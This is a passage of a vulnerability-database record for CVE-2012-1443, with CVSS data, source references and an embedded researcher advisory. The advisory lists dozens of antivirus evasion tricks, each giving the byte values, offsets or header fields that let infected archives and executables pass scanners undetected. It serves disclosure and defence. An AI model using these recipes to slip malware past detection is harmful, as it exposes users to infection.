                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:alwil:avast_antivirus:4.8.1351.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:alwil:avast_antivirus:5.0.677.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                  ],
                  operator: "OR",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-1443",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Suman Jana and Vitaly Shmatikov",
      sources: [
         {
            db: "BID",
            id: "52612",
         },
      ],
      trust: 0.3,
   },
   cve: "CVE-2012-1443",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 8.6,
                  impactScore: 2.9,
                  integrityImpact: "PARTIAL",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Medium",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "None",
                  baseScore: 4.3,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2012-1443",
                  impactScore: null,
                  integrityImpact: "Partial",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                  version: "2.0",
               },
               {
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 8.6,
                  id: "VHN-54724",
                  impactScore: 2.9,
                  integrityImpact: "PARTIAL",
                  severity: "MEDIUM",
                  trust: 0.1,
                  vectorString: "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                  version: "2.0",
               },
            ],
            cvssV3: [],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2012-1443",
                  trust: 1.8,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201203-407",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "VULHUB",
                  id: "VHN-54724",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54724",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            db: "NVD",
            id: "CVE-2012-1443",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations. The RAR file parser in multiple products contains a vulnerability that can prevent malware detection. If it is later announced that the problem also exists independently in different RAR parser implementations, this vulnerability may be split into multiple CVEs. An attacker may be able to evade malware detection via a RAR file that starts with an MZ character sequence. \nSuccessful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. 
Sophos Anti-Virus is a set of anti-virus software for various operating systems from Sophos, UK. The software detects and removes viruses, spyware, trojans and worms in real time, ensuring comprehensive network protection for desktops and laptops. Multiple file-parsing vulnerabilities leading to evasion in different antivirus(AV) products. All \naffected products are command-line versions of \nthe AVs. \n\n----------------------------\nVulnerability Descriptions\n----------------------------\n\n1. Specially crafted infected POSIX TAR files with \"[aliases]\" as first 9 bytes \n   evades detection. \n\n   Affected products -\n   ClamAV 0.96.4, CAT-QuickHeal 11.00\n  \n   CVE no - \n   CVE-2012-1419\n\n2. Specially crafted infected POSIX TAR files with \"\\7fELF\" as first 4 bytes \n   evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, \n   Fortinent 4.2.254.0, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, \n   Microsoft 1.6402, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, \n   Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1420\n\n3. Specially crafted infected POSIX TAR files with \"MSCF\" as first 4 bytes \n   evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, \n   Symantec 20101.3.0.103\n\n   CVE no - \n   CVE-2012-1421\n\n4. Specially crafted infected POSIX TAR files with \"ITSF\" as first 4 bytes \n   evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1422\n\n5. Specially crafted infected POSIX TAR files with \"MZ\" as first 2 bytes \n   evades detection. \n\n   Affected products -\n   Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinent 4.2.254.0, \n   Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, \n   PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0\n\n   CVE no - \n   CVE-2012-1423\n\n6. 
Specially crafted infected POSIX TAR files with \"\\19\\04\\00\\10\" at offset 8\n   evades detection. \n\n   Affected products -\n   Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, \n   PCTools 7.0.3.5, Sophos 4.61.0\n\n   CVE no - \n   CVE-2012-1424\n\n\n7. Specially crafted infected POSIX TAR files with \"\\50\\4B\\03\\04\" as the first\n   4 bytes evades detection. \n\n   Affected products -\n   AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Emsisoft 5.1.0.1,\n   Fortinet 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, \n   Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n   NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Symantec 20101.3.0.103, \n   TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004 \n\n   CVE no - \n   CVE-2012-1425\n\n8. Specially crafted infected POSIX TAR files with \"\\42\\5A\\68\" as the first\n   3 bytes evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, \n   K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1426\n\n\n9. Specially crafted infected POSIX TAR files with \"\\57\\69\\6E\\5A\\69\\70\" at \n   offset 29 evades detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0\n\n   CVE no - \n   CVE-2012-1427\n\n10. Specially crafted infected POSIX TAR files with \"\\4a\\46\\49\\46\" at offset 6\n   evades detection. \n   \n   Affected products -\n   CAT-QuickHeal 11.00,  Norman 6.06.12, Sophos 4.61.0\n\n   CVE no - \n   CVE-2012-1428\n\n11. Specially crafted infected ELF files with \"ustar\" at offset 257\n   evades detection. \n\n   Affected products -\n   BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n   F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, \n   McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01 \n\n   CVE no - \n   CVE-2012-1429\n12. 
Specially crafted infected ELF files with \"\\19\\04\\00\\10\" at offset 8 evades\n   detection. \n\n   Affected products -\n   BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, \n   McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, \n   Sophos 4.61.0, Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1430\n13. Specially crafted infected ELF files with \"\\4a\\46\\49\\46\" at offset 6 evades\n   detection. \n\n   Affected products -\n   BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, \n   F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, \n   nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03\n\n   CVE no - \n   CVE-2012-1431\n\n14. Specially crafted infected MS EXE files with \"\\57\\69\\6E\\5A\\69\\70\" at offset\n   29 evades detection. \n\n   Affected products -\n   Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1432\n\n15. Specially crafted infected MS EXE files with \"\\4a\\46\\49\\46\" at offset\n   6 evades detection. \n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n   Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1433\n\n16. Specially crafted infected MS EXE files with \"\\19\\04\\00\\10\" at offset\n   8 evades detection. \n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, \n   Panda 10.0.2.7\n   \n   CVE no - \n   CVE-2012-1434\n\n17. Specially crafted infected MS EXE files with \"\\50\\4B\\4C\\49\\54\\45\" at \n   offset 30 evades detection. \n   \n   Affected products - \n   AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n   Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1435\n\n18. Specially crafted infected MS EXE files with \"\\2D\\6C\\68\" at \n   offset 2 evades detection. 
\n \n   Affected products - \n   AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n   Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1436\n\n19. Specially crafted infected MS Office files with \"\\50\\4B\\53\\70\\58\" at \n   offset 526 evades detection. \n   \n   Affected products - \n   Comodo 7425\n   \n   CVE no - \n   CVE-2012-1437\n\n20. Specially crafted infected MS Office files with \"ustar\" at \n   offset 257 evades detection. \n\n   Affected products - \n   Comodo 7425, Sophos 4.61.0 \n\n   CVE no - \n   CVE-2012-1438\n\n21. 'padding' field in ELF files is parsed incorrectly. \n    If an infected ELF file's padding field is incremented by 1 it evades\n    detection.    \n\n   Affected products - \n   eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1439\n\n22. 'identsize' field in ELF files is parsed incorrectly. \n    If an infected ELF file's identsize field is incremented by 1 it evades\n    detection.    \n\n   Affected products - \n   Norman 6.06.12, eSafe 7.0.17.0, eTrust-Vet 36.1.8511, Fortinet 4.2.254.0, \n   Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1440\n\n23. 'e_ip' and 'e_res' field in MS EXE files are parsed incorrectly.  \n    If any of these fields in an infected MS EXE file is incremented by 1 \n    it evades detection.    \n\n   Affected products - \n   Prevx 3.0\n\n   'e_minalloc', 'e_res2','e_cparhdr', 'e_crlc', 'e_lfarlc','e_maxalloc',\n    'e_oeminfo', 'e_ovno', 'e_cs', 'e_csum','e_sp', 'e_ss', 'e_cblp' and \n    'e_oemid' fields in MS EXE files are parsed incorrectly.  \n    If any of these fields in an infected MS EXE file is incremented by 1 \n    it evades detection.    \n\n   Affected products - \n   eSafe 7.0.017.0, Prevx 3.0\n\n\n   CVE no - \n   CVE-2012-1441\n\n24. 'class' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's class field is incremented by 1 it evades\n    detection. 
\n\n   Affected products - \n   CAT-QuickHeal 11.00, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n   eSafe 7.0.017.0, Kaspersky 7.0.0.125, F-Secure 9.0.16160.0, \n   Sophos 4.61.0, Antiy-AVL 2.0.3.7, Rising 22.83.00.03, Fortinet 4.2.254.0, \n   Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1442\n\n25. Infected RAR files with initial two bytes set to 'MZ' can be fixed by the \n    user and correctly extracted. Such a file evades detection.  \n    \n   Affected products -\n   ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, \n   Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, \n   Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, \n   VirusBuster 13.6.151.0, Fortinent 4.2.254.0, Antiy-AVL 2.0.3.7, \n   K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004,Kaspersky 7.0.0.125 \n   Jiangmin 13.0.900. Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, \n   Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, \n   TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0\n   nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, \n   Avast5 5.0.677.0, VBA32 3.12.14.2   \n\n   CVE no - \n   CVE-2012-1443\n\n26. 'abiversion' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's abiversion field is incremented by 1 it evades\n    detection. \n\n   Affected products - \n   eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1444\n\n27. 'abi' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's abi field is incremented by 1 it evades\n    detection. \n\n   Affected products - \n   eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1445\n\n28. 'encoding' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's encoding field is incremented by 1 it evades\n    detection. 
\n\n   Affected products - \n   CAT-QuickHeal 11.00, McAfee 5.400.0.1158, Symantec 20101.3.0.103, \n   Norman 6.06.12, eSafe 7.0.017.0, Kaspersky 7.0.0.125, \n   McAfee-GW-Edition 2010.1C, Sophos 4.61.0, eTrust-Vet 36.1.8511, \n   Antiy-AVL 2.0.3.7, PCTools 7.0.3.5, Rising 22.83.00.03, Fortinet 4.2.254.0,\n   Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1446\n\n29. 'e_version' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's e_version field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n    Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1447\n\n30. 'cbCabinet' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's cbCabinet field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0\n   TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1 \n\n   CVE no - \n   CVE-2012-1448\n\n31. 'vMajor' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's vMajor field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   NOD32 5795, Rising 22.83.00.03\n   \n   CVE no - \n   CVE-2012-1449\n\n32. 'reserved3' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's reserved field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0\n   \n   CVE no - \n   CVE-2012-1450\n\n33. 'reserved2' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's reserved2 field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0\n   \n   CVE no - \n   CVE-2012-1451\n\n34. 'reserved1' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's reserved field is incremented by 1 it evades\n    detection. 
\n\n   Affected products -\n   Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00\n   \n   CVE no - \n   CVE-2012-1452\n\n35. 'coffFiles' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's coffFiles field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   McAfee 5.0.2.03300, TrendMicro-HouseCall 9.120.0.1004, Kaspersky 7.0.0.125, \n   Sophos 4.61.0, TrendMicro 9.120.0.1004, McAfee-GW-Edition 2010.1C,\n   Emsisoft 5.1.0.1, eTrust-Vet 36.1.8511, Antiy-AVL 2.0.3.7, Microsoft 1.6402,\n   Rising 22.83.00.03, Ikarus T3.1.1.97.0, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1453\n\n36. 'ei_version' field in ELF files is parsed incorrectly.  \n    If an infected ELF file's version field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, \n   Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n   CVE no - \n   CVE-2012-1454\n\n37. 'vMinor' field in CAB files is parsed incorrectly.  \n    If an infected CAB file's version field is incremented by 1 it evades\n    detection. \n\n   Affected products -\n   NOD32 5795, Rising 22.83.00.03\n \n   CVE no - \n   CVE-2012-1455\n\n38. A specially crafted ZIP file, created by concatenating the contents \n   of a clean TAR archive and a virus-infected ZIP archive, is parsed \n   incorrectly and evades detection. \n\n   Affected products -\n   AVG 10.0.0.1190, CAT-QuickHeal 11.00, Comodo 7424, Emsisoft 5.1.0.1,\n   eSafe 7.0.17.0, F-Prot 4.6.2.117,Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n   Jiangmin 13.0.900, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, \n   McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, \n   Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, \n   TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004\n\n   CVE no - \n   CVE-2012-1456\n\n39. 
If the length field in the header of a file with test EICAR virus\n   included into a TAR archive is set to be greater than the archive's total \n   length (1,000,000+original length in our experiments), the antivirus \n   declares the file to be clean but virus gets extracted correctly by the \n   GNU tar program. \n\n   Affected products -\n   AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, \n   AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, \n   Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, \n   GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, \n   Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n   Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, \n   Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, \n   TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0 \n\n   CVE no - \n   CVE-2012-1457\n\n40. A Windows Compiled HTML Help (CHM) file is a set of HTML files,\n   scripts, and images compressed using the LZX algorithm. \n   For faster random accesses, the algorithm is reset at intervals\n   instead of compressing the entire file as a single stream. The\n   length of each interval is specified in the LZXC header. \n\n   If an infected CHM file's header modified so that the reset interval\n   is lower than in the original file, the antivirus declares the file\n   to be clean. But the Windows CHM viewer hh.exe correctly decompresses\n   the infected content located before the tampered header. \n\n   Affected products -\n   ClamAV 0.96.4, Sophos 4.61.0 \n\n   CVE no - \n   CVE-2012-1458\n\n41. In a POSIX TAR archive, each member file has a 512-byte header protected\n   by a simple checksum. Every header also contains a file length field, which\n   is used by the extractor to locate the next header in the archive. 
\n\n   If a TAR archive contains two files: the first one is clean, while\n   the second is infected with test EICAR virus - and it is modified such that \n   the length field in the header of the first, clean file to point into the \n   middle of the header of the second, infected file. The antivirus declares \n   the file to be clean but virus gets extracted correctly by the \n   GNU tar program. If an infected tar.gz archive is appended 6 random bytes at the end, \n    the antivirus declares the file to be clean but virus gets extracted by\n    the gunzip+tar programs correctly by ignoring these bytes. \n\n   Affected products -\n   Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, \n   eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, \n   K7AntiVirus 9.77.3565, VBA32 3.12.14.2 \n   \n   CVE no - \n   CVE-2012-1460\n\n43. GZIP files can contain multiple compressed streams, which are assembled\n    when the contents are extracted. If an infected .tar.gz file is broken \n    into two streams, the antivirus declares the infected .tar.gz file to \n    be clean while tar+gunzip extract the virus correctly\n\n   Affected products -\n   AVG 10.0.0.1190, BitDefender 7.2, Command 5.2.11.5, Emsisoft 5.1.0.1, \n   F-Secure 9.0.16160.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n   Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, \n   McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, \n   Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, \n   TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2 \n\n   CVE no - \n   CVE-2012-1461\n\n44. 
If an infected ZIP archive is prepended with 1024 random bytes at the \n   beginning, the antivirus declares the file to be clean but virus gets extracted\n   by the unzip program correctly by skipping these bytes\n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, \n   Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n   Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, \n   Symantec 20101.3.0.103 \n\n   CVE no - \n   CVE-2012-1462\n\n45. In most ELF files, the 5th byte of the header indicates endianness: 01\n   for little-endian, 02 for bigendian. Linux kernel, however, does not\n   check this field before loading an ELF file. If an infected ELF file's 5-th \n   byte is set to 02, the antivirus declares the file to be clean but the ELF \n   file gets executed correctly. \n\n   Affected products -\n   AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, \n   Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, \n   McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7 \n\n   CVE no - \n   CVE-2012-1463\n\n--------\nCredits\n--------\nVulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov. \n\n-----------\nReferences\n-----------\n\"Abusing File Processing in Malware Detectors for Fun and Profit\" by Suman Jana and Vitaly Shmatikov\nTo appear in IEEE Symposium on Security and Privacy 2012\nhttp://www.ieee-security.org/TC/SP2012/ \n",
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-1443",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            db: "BID",
            id: "52612",
         },
         {
            db: "VULHUB",
            id: "VHN-54724",
         },
         {
            db: "PACKETSTORM",
            id: "110990",
         },
      ],
      trust: 2.07,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2012-1443",
            trust: 2.9,
         },
         {
            db: "BID",
            id: "52612",
            trust: 1.4,
         },
         {
            db: "OSVDB",
            id: "80469",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80461",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80454",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80455",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80467",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80468",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80471",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80456",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80459",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80472",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80470",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80457",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80460",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80458",
            trust: 1.1,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-407",
            trust: 0.7,
         },
         {
            db: "BUGTRAQ",
            id: "20120319 EVASION ATTACKS EXPOLITING FILE-PARSING VULNERABILITIES IN ANTIVIRUS PRODUCTS",
            trust: 0.6,
         },
         {
            db: "NSFOCUS",
            id: "19198",
            trust: 0.6,
         },
         {
            db: "VULHUB",
            id: "VHN-54724",
            trust: 0.1,
         },
         {
            db: "PACKETSTORM",
            id: "110990",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54724",
         },
         {
            db: "BID",
            id: "52612",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            db: "PACKETSTORM",
            id: "110990",
         },
         {
            db: "NVD",
            id: "CVE-2012-1443",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
   },
   id: "VAR-201203-0367",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54724",
         },
      ],
      trust: 0.01,
   },
   last_update_date: "2023-12-18T12:10:12.911000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "AVL SDK",
            trust: 0.8,
            url: "http://www.antiy.net/en/avlsdk.html",
         },
         {
            title: "Command Antivirus",
            trust: 0.8,
            url: "http://www.authentium.com/command/csavdownload.html",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "https://www.avast.co.jp/index",
         },
         {
            title: "AVG Anti-Virus",
            trust: 0.8,
            url: "http://www.avgjapan.com/home-small-office-security/buy-antivirus",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.avira.com/",
         },
